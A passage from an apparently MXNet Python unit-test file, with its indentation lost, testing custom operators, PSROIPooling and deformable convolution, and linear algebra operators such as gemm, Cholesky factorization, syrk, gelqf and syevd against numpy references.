def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
if not sys.platform.startswith('win'): # no fork in windows
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive(), "deadlock may exist in custom operator"
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
shape = (4, 4, 1, 1)
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw(test_potrf, [data_in], [res_potrf])
if grad_check == 1:
check_grad(test_potrf, [data_in])
# test potri
ones = mx.nd.ones(shape).asnumpy()
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw(test_potri, [data_in], [res_potri])
if grad_check == 1:
check_grad(test_potri, [data_in])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw(test_trsm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trsm, [trian_in,data_in])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw(test_trmm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trmm, [trian_in, data_in])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
if grad_check == 1:
check_grad(test_sumlogdiag, [data_in])
# more elaborate example of Cholesky factorization
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
low_trian = trian
if not lower:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw(test_potrf, [a], [r])
if grad_check == 1:
check_grad(test_potrf, [a])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw(test_potri, [a], [r])
if grad_check == 1:
check_grad(test_potri, [a])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw(test_trsm, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm, [a, b])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw(test_trsm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm2, [a, b])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw(test_trsm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm3, [a, b])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw(test_trsm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm4, [a, b])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw(test_trmm, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm, [a, b])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw(test_trmm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm2, [a, b])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw(test_trmm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm3, [a, b])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw(test_trmm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm4, [a, b])
# test sumlogdiag
a = rep_3x(pow, 4, 4)
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw(test_sumlogdiag, [a], [r])
if grad_check == 1:
check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
